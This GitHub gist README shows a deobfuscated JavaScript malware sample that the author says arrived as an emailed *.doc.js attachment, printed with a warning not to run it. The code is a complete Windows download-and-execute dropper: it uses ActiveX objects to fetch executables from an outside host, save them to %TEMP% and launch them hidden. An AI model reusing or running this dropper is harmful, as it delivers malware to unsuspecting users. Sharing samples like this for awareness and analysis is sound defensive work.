Skip to content

Instantly share code, notes, and snippets.

@penguinpowernz

penguinpowernz/README.md

Created December 17, 2014 22:08
Show Gist options
  • Save penguinpowernz/df016f61718c5daaadec to your computer and use it in GitHub Desktop.
Save penguinpowernz/df016f61718c5daaadec to your computer and use it in GitHub Desktop.
Download ZIP
Random JS exploit
Raw
README.md

DO NOT RUN THIS CODE

Especially on a Windows machine. I got this in an email as an attached zip. The file inside was a *.doc.js file. Real smooth guys.

The JS in this file was obfuscated, but it generated a function into a string and then eval'd that string. This is the resulting function that would be evaluated:

function dl(fr,fn,rn) {
  var ws = new ActiveXObject("WScript.Shell");
  var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+fn;
  var xo = new ActiveXObject("MSXML2.XMLHTTP");
  xo.onreadystatechange = function() {
    if (xo.readyState === 4) {
      var xa = new ActiveXObject("ADODB.Stream");
      xa.open();
      xa.type = 1;
      xa.write(xo.ResponseBody);
      xa.position = 0;
      xa.saveToFile(fn,2);
      xa.close();
    };
  };

  try {
    xo.open("GET",fr,false);
    xo.send();

    if (rn > 0) {
      ws.Run(fn,0,0);
    };
  } catch (er) { };
};

dl("http://amc.s5-tech.com/document.php?id=5450535E0500090D0A240511100B03160B134A070B09&rnd=8322691","88484923.exe",1);
dl("http://amc.s5-tech.com/document.php?id=5450535E0500090D0A240511100B03160B134A070B09&rnd=3458722","18304810.exe",1);
dl("http://amc.s5-tech.com/document.php?id=5450535E0500090D0A240511100B03160B134A070B09&rnd=393383","15727494.exe",1);

Interesting....

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment